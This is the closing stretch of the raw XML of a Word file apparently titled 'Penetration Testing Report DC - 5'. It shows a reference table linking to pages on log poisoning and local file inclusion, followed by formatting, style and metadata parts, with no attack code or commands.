              <w:t xml:space="preserve">Reference </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="629C418B" w14:textId="7B679DFC" w:rsidR="009F798C" w:rsidRDefault="00D34036">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId30" w:history="1">
              <w:r w:rsidRPr="00AD5266">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>https://henkel-security.com/tag/log-poisoning/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="0B1A9B93" w14:textId="77777777" w:rsidR="00D34036" w:rsidRDefault="00D34036">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="31517C06" w14:textId="56089B33" w:rsidR="00D34036" w:rsidRDefault="00D34036">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId31" w:history="1">
              <w:r w:rsidRPr="00AD5266">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>https://www.invicti.com/learn/local-file-inclusion-lfi</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="6BADAE40" w14:textId="626047B4" w:rsidR="00D34036" w:rsidRPr="009F798C" w:rsidRDefault="00D34036">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D417454" w14:textId="77777777" w:rsidR="00F168F1" w:rsidRDefault="00F168F1"/>
    <w:sectPr w:rsidR="00F168F1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F1792" w14:textId="77777777" w:rsidR="00EA53CD" w:rsidRDefault="00EA53CD" w:rsidP="009F798C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1F5287A4" w14:textId="77777777" w:rsidR="00EA53CD" w:rsidRDefault="00EA53CD" w:rsidP="009F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9F798C" w14:paraId="585C5D89" w14:textId="77777777">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="2500" w:type="pct"/>
          <w:shd w:val="clear" w:color="auto" w:fill="4472C4" w:themeFill="accent1"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="550BAAEB" w14:textId="26FE3C93" w:rsidR="009F798C" w:rsidRDefault="009F798C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BBEDA0DDBBA140A48F419A4C51C5B6A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Penetration Testing Report DC - 5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2C3752B9E6824460BDD07E5381DEF6B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BA8DE13" w14:textId="5424E267" w:rsidR="009F798C" w:rsidRDefault="009F798C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5626C313" w14:textId="77777777" w:rsidR="009F798C" w:rsidRDefault="009F7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3DAF" w14:textId="77777777" w:rsidR="00EA53CD" w:rsidRDefault="00EA53CD" w:rsidP="009F798C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="669F6A56" w14:textId="77777777" w:rsidR="00EA53CD" w:rsidRDefault="00EA53CD" w:rsidP="009F7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08BC" w14:textId="3A5062A6" w:rsidR="009F798C" w:rsidRDefault="009F79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E55D96" wp14:editId="524410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CFCD95F" w14:textId="6A5BD60F" w:rsidR="009F798C" w:rsidRDefault="009F798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DC - 5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E55D9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CFCD95F" w14:textId="6A5BD60F" w:rsidR="009F798C" w:rsidRDefault="009F798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DC - 5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CFF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8F2E6B1C"/>
    <w:lvl w:ilvl="0" w:tplc="A9687A2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1C32"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9E06D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81C5D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E036FD9C"/>
    <w:lvl w:ilvl="0" w:tplc="A9687A2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21396">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1792747560">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="109740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78"/>
    <w:rsid w:val="00185078"/>
    <w:rsid w:val="002D1209"/>
    <w:rsid w:val="002E22FB"/>
    <w:rsid w:val="00353E6A"/>
    <w:rsid w:val="003C57E3"/>
    <w:rsid w:val="00472AEC"/>
    <w:rsid w:val="00750F3E"/>
    <w:rsid w:val="009330FA"/>
    <w:rsid w:val="009F798C"/>
    <w:rsid w:val="00A327B3"/>
    <w:rsid w:val="00AE7808"/>
    <w:rsid w:val="00D34036"/>
    <w:rsid w:val="00EA53CD"/>
    <w:rsid w:val="00F0329A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E6761"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{60183276-1B05-4657-95AC-00A79824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7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98C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009F7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98C"/>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="009F7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0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invicti.com/learn/local-file-inclusion-lf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henkel-security.com/tag/log-poisoning/" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/glossaryDocument" Target="glossary/document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EDA0DDBBA140A48F419A4C51C5B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BE456-37BF-46B4-9070-32C6C811F16F}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00000000" w:rsidRDefault="0066795D" w:rsidP="0066795D">
          <w:pPr>
            <w:pStyle w:val="BBEDA0DDBBA140A48F419A4C51C5B6AB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2C3752B9E6824460BDD07E5381DEF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87068-095C-4B49-BE0D-689CA4D32C74}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00000000" w:rsidRDefault="0066795D" w:rsidP="0066795D">
          <w:pPr>
            <w:pStyle w:val="2C3752B9E6824460BDD07E5381DEF6B1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5D"/>
    <w:rsid w:val="00166EA2"/>
    <w:rsid w:val="003C57E3"/>
    <w:rsid w:val="0066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EDA0DDBBA140A48F419A4C51C5B6AB">
    <w:name w:val="BBEDA0DDBBA140A48F419A4C51C5B6AB"/>
    <w:rsid w:val="0066795D"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="2C3752B9E6824460BDD07E5381DEF6B1">
    <w:name w:val="2C3752B9E6824460BDD07E5381DEF6B1"/>
    <w:rsid w:val="006679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DC - 5</dc:title>
  <dc:subject/>
  <dc:creator>Yash Pawar</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Yash Pawar</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-08T15:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-08T18:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>